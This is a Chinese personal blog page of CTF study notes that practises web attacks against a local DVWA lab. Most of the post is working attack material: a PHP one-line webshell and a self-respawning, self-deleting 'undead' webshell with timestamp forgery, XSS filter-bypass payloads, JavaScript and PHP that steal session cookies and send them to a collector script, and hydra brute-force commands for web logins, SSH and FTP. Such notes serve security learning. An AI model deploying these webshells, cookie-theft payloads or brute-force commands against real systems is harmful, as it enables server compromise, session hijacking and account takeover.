<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="normal," />










<meta name="description" content="#1.文件上传： 最基本php一句话木马。上传至服务器，（本地靶场会自动解析上传的文件），用菜刀连接。 &amp;lt;?php@eval($_POST[&apos;1&apos;]); ?&amp;gt; 不死马，一句话木马升级版。上传至服务器后，一旦解析，会无限循环生成一句话木马。将这个文件上传到服务器，然后进行访问，会在该路径下一直生成一个名字为2.php的shell文件，然后使用caidao输入 http://xxx/2.p">
<meta name="keywords" content="normal">
<meta property="og:type" content="article">
<meta property="og:title" content="CTF比赛学习笔记第二周">
<meta property="og:url" content="http://yoursite.com/2020/05/23/2020-5-31/index.html">
<meta property="og:site_name" content="A funny p1g">
<meta property="og:description" content="#1.文件上传： 最基本php一句话木马。上传至服务器，（本地靶场会自动解析上传的文件），用菜刀连接。 &amp;lt;?php@eval($_POST[&apos;1&apos;]); ?&amp;gt; 不死马，一句话木马升级版。上传至服务器后，一旦解析，会无限循环生成一句话木马。将这个文件上传到服务器，然后进行访问，会在该路径下一直生成一个名字为2.php的shell文件，然后使用caidao输入 http://xxx/2.p">
<meta property="og:locale" content="en">
<meta property="og:updated_time" content="2020-06-03T08:08:17.241Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="CTF比赛学习笔记第二周">
<meta name="twitter:description" content="#1.文件上传： 最基本php一句话木马。上传至服务器，（本地靶场会自动解析上传的文件），用菜刀连接。 &amp;lt;?php@eval($_POST[&apos;1&apos;]); ?&amp;gt; 不死马，一句话木马升级版。上传至服务器后，一旦解析，会无限循环生成一句话木马。将这个文件上传到服务器，然后进行访问，会在该路径下一直生成一个名字为2.php的shell文件，然后使用caidao输入 http://xxx/2.p">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/05/23/2020-5-31/"/>





  <title>CTF比赛学习笔记第二周 | A funny p1g</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">A funny p1g</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">宁移白首，不坠青云。</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/05/23/2020-5-31/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="1yy">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://ozajykkro.bkt.clouddn.com/69c1dcbbly1fjepkwst9zj20xc0xdn0i.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="A funny p1g">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">CTF比赛学习笔记第二周</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-05-23T10:00:00+08:00">
                2020-05-23
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>#1.文件上传：<br>
最基本php一句话木马。上传至服务器，（本地靶场会自动解析上传的文件），用菜刀连接。<br>
<code>&lt;?php@eval($_POST['1']); ?&gt;</code><br>
不死马，一句话木马升级版。上传至服务器后，一旦解析，会无限循环生成一句话木马。将这个文件上传到服务器，然后进行访问，会在该路径下一直生成一个名字为2.php的shell文件，然后使用caidao输入<br>
<a href="http://xxx/2.php?pass=pass%E7%9A%84%E8%B7%AF%E5%BE%84%EF%BC%8C%E5%AF%86%E7%A0%81%E4%B8%BA1%E5%B0%B1%E5%8F%AF%E4%BB%A5%E9%93%BE%E6%8E%A5%E4%B8%80%E5%8F%A5%E8%AF%9D%E3%80%82" target="_blank" rel="external">http://xxx/2.php?pass=pass的路径，密码为1就可以链接一句话。</a><br>
由于pass是md5加密很难被破解也可以做到隐蔽</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ignore_user_abort(true); //函数设置与客户机断开是否会终止脚本的执行。这里设置为true则忽略与用户的断开，即使与客户机断开脚本仍会执行。</span><br><span class="line">set_time_limit(0);</span><br><span class="line">unlink(__FILE__);  //删除本身</span><br><span class="line">$file = &apos;2.php&apos;;</span><br><span class="line">$code = &apos;&lt;?php if(md5($_GET[&quot;pass&quot;])==&quot;1a1dc91c907325c69271ddf0c944bc72&quot;)&#123;@eval($_POST[1]);&#125; ?&gt;&apos;; // pass的md5加密</span><br><span class="line">while (1)&#123;</span><br><span class="line">    file_put_contents($file,$code);</span><br><span class="line">    system(&apos;touch -m -d &quot;2018-12-01 09:10:12&quot; .2.php&apos;); //执行的命令用于修改文件的创建或修改时间</span><br><span class="line">    usleep(5000);</span><br><span class="line">&#125; </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>一句话木马或者不死马只是上传的第一步攻击，若要提权还需上传大马进行cmd操作。大马以后再记录。</p>
<blockquote>
<p>本地靶场的图片木马无法通过菜刀连接，用文件包含漏洞的时候菜刀报错需要靶场的用户名密码，计划第三周内解决这个问题。<br>
<code>copy tupian.jpg/b + muma.php/a eval.jpg</code><br>
#2.xss漏洞：<br>
首先验证xss漏洞的存在。若能弹框则说明有xss注入点。</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;</span><br><span class="line">2.&lt;scr&lt;script&gt;ipt src=http://127.0.0.1/cookie.js&gt;&lt;/script&gt; //有过滤：&lt;script&gt;标签替换为了空</span><br><span class="line">3.&lt;SCRIPT src=http://127.0.0.1/cookie.js&gt;&lt;/SCRIPT&gt; //有过滤：区分大小写</span><br><span class="line">4.&lt;img src=# onerror=alert(&quot;xss&quot;)&gt; //有过滤：提交内容只要有script顺序出现的字母都一律过滤掉，只是过滤了script标签，但是有一些javascript事件后仍然能执行javascript代码，构造payload。</span><br></pre></td></tr></table></figure>
<p>远程获取cookie。<br>
首先构造接受cookie的数据库。本地靶场有三个练习环境，所以建三张表。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">create database dvwaxss;</span><br><span class="line">use dvwaxss;</span><br><span class="line">create table low(id int not null auto_increment primary key,cookie varchar(100) not null);</span><br><span class="line">create table medium(id int not null auto_increment primary key,cookie varchar(100) not null);</span><br><span class="line">create table high(id int not null auto_increment primary key,cookie varchar(100) not null);</span><br></pre></td></tr></table></figure>
<p>远程连接cookie的js代码cookie.js。这段js代码的作用是在页面中构造一个隐藏表单和一个隐藏域，内容为当前的cookie，并且以post方式发送到steal.php。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">document.write(&quot;&lt;form action=&apos;http://127.0.0.1/steal.php&apos; name=&apos;exploit&apos; method=&apos;post&apos; style=&apos;display:none&apos;&gt;&quot;); //本地php文件目录</span><br><span class="line">document.write(&quot;&lt;input type=&apos;hidden&apos; name=&apos;data&apos; value=&apos;&quot;+document.cookie+&quot;&apos;&gt;&quot;);</span><br><span class="line">document.write(&quot;&lt;/form&gt;&quot;);</span><br><span class="line">document.exploit.submit();</span><br></pre></td></tr></table></figure>
<p>steal.php代码。以第1级别为例，23级只是在59、65、71行数据库表名有不同。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">header(&quot;content-type:text/html;charset=utf-8&quot;);</span><br><span class="line">$conn=mysqli_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;&quot;,&quot;dvwaxss&quot;); //连接本地数据库</span><br><span class="line">if(isset($_GET[&apos;data&apos;]))</span><br><span class="line">&#123;</span><br><span class="line">    $sql=&quot;insert into low(cookie) values(&apos;&quot;.$_GET[&apos;data&apos;].&quot;&apos;);&quot;;</span><br><span class="line">    $result=mysql_query($sql,$conn);</span><br><span class="line">    mysql_close();</span><br><span class="line">&#125;</span><br><span class="line">else if(isset($_POST[&apos;data&apos;]))</span><br><span class="line">&#123;</span><br><span class="line">    $sql=&quot;insert into low(cookie) values(&apos;&quot;.$_POST[&apos;data&apos;].&quot;&apos;);&quot;;</span><br><span class="line">    $result=mysql_query($sql,$conn);</span><br><span class="line">    mysql_close();</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">    $sql=&quot;select * from low&quot;;</span><br><span class="line">    $result=mysql_query($sql,$conn);</span><br><span class="line">    while($row=mysql_fetch_array($result))</span><br><span class="line">    &#123;</span><br><span class="line">        echo &quot;偷取的cookie:&quot;.$row[1].&quot;&lt;/br&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    mysql_close();</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>攻击代码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;script src=http://127.0.0.1/cookie.js&gt;&lt;/script&gt;</span><br><span class="line">&lt;scr&lt;script&gt;ipt src=http://127.0.0.1/cookie.js&gt;&lt;/script&gt;</span><br><span class="line">&lt;SCRIPT src=http://127.0.0.1/cookie.js&gt;&lt;/SCRIPT&gt;</span><br><span class="line">&lt;img src=# onerror=(locat&amp;#x69;on.href=&quot;http://127.0.0.1/steal.php?data=&quot;+document.cookie)&gt; //img onerror已经处罚script事件，无需用cookie.js连接。</span><br></pre></td></tr></table></figure>
<p>另一个简单的方法，无需建数据库用php导入。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">   $cookie = $_GET[&apos;cookie&apos;];</span><br><span class="line">   file_put_contents(&apos;cookie.txt&apos;,$cookie)</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>攻击代码<br>
<code>&lt;script&gt;document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;&lt;/script&gt;</code><br>
不过需要进行URLlencode编码。</p>
<blockquote>
<p>本地编码工具计划本周下载准备好。</p>
</blockquote>
<p>#3.暴力破解：hydra,如果目标网站登录时候需要验证码就无法破解了<br>
get暴力破解。-L 用户了字典 -P 密码字典 -o 输出 -vV显示详细信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -L user.txt -P passwd.txt -o http_get.txt -vV 127.0.0.1 http-get-form &quot;/DVWA-master/vulnerabilities/brute/:username=^USER^&amp;password=^PASS^&amp;Login=Login:F=Username and/or password incorrect:H=Cookie: PHPSESSID=nvvrgk2f84qhnh43cm28pt42n6; security=low&quot; -t 3</span><br></pre></td></tr></table></figure>
<p>用：分隔参数<br>
/DVWA/vulnerabilities/brute/代表请求目录；username=<sup>USER</sup>&amp;password=<sup>PASS</sup>&amp;Login=Login，抓包获得，其中<sup>USER</sup>和<sup>PASS</sup>代表是攻击载荷；F=后面是代表密码错误时的关键字符串(错误时网页返回，可以猜测)；H后面是cookie信息<br>
post暴力破解</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -L user.txt -P passwd.txt -t 3 -o http_post.txt -vV 127.0.0.1 http-post-form &quot;/DVWA-master/login.php:username=^USER^&amp;password=^PASS^&amp;Login=Login&amp;user_token=dd6bbcc4f4672afe99f15b1d2c249ea5:S=index.php&quot;</span><br></pre></td></tr></table></figure>
<p>username=<sup>USER</sup>&amp;password=<sup>PASS</sup>&amp;Login=Login&amp;user_token=dd6bbcc4f4672afe99f15b1d2c249ea5抓包获得，其中<sup>USER</sup>和<sup>PASS</sup>代表是攻击载荷，user_token：带有token验证。<br>
S后的是密码正确时返回应用的关键字符串。<br>
不过采用了token的验证方式，每次登录的token都是不一样的，所以不能用hydra来破解。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=&quot;index.php&quot; method=&quot;POST&quot;&gt;</span><br><span class="line">&lt;input type=&quot;text&quot; name=&quot;name&quot; /&gt;&lt;BR&gt;&lt;br&gt;</span><br><span class="line">&lt;input type=&quot;password&quot; name=&quot;pwd&quot; /&gt;&lt;br&gt;&lt;br&gt;</span><br><span class="line">&lt;input type=&quot;submit&quot; name=&quot;sub&quot; value=&quot;提交&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure>
<p>假设有以上一个密码登录表单，我们执行命令：<br>
<code>hydra -L user.txt -P passwd.txt -o http_get.txt -t 5 -f 127.0.0.1 http-post-form “/index.php:name=^USER^&amp;pwd=^PASS^:&lt;title&gt;invalido&lt;/title&gt;”</code><br>
ssh破解<br>
<code>hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 ip ssh</code><br>
ftp破解<br>
<code>hydra -L user.txt -P passwd.txt -o ftp.txt -vV -t 5 ip ftp</code></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/normal/" rel="tag"><i class="fa fa-moon-o" aria-hidden="true"></i> normal</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/05/23/2020-5-23/" rel="next" title="CTF比赛学习笔记第一周">
                <i class="fa fa-chevron-left"></i> CTF比赛学习笔记第一周
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="http://ozajykkro.bkt.clouddn.com/69c1dcbbly1fjepkwst9zj20xc0xdn0i.jpg"
                alt="1yy" />
            
              <p class="site-author-name" itemprop="name">1yy</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">46</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
              
                <span class="links-of-author-item">
                  <a href="https://github.com/Yyp1gg" target="_blank" title="GitHub">
                    
                      <i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:yypigg@163.com" target="_blank" title="E-Mail">
                    
                      <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                </span>
              
            
          </div>

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heartbeat" aria-hidden="true"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">1yy</span>

  
</div>




  <div class="powered-by">Powered by <a >YOU</a></div>


        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  





  

  

  
  

  

  

  


  
<script type="text/javascript"
color="105,105,105" opacity='0.8' zIndex="-2" count="20" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

  
</body>
</html>
  <!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>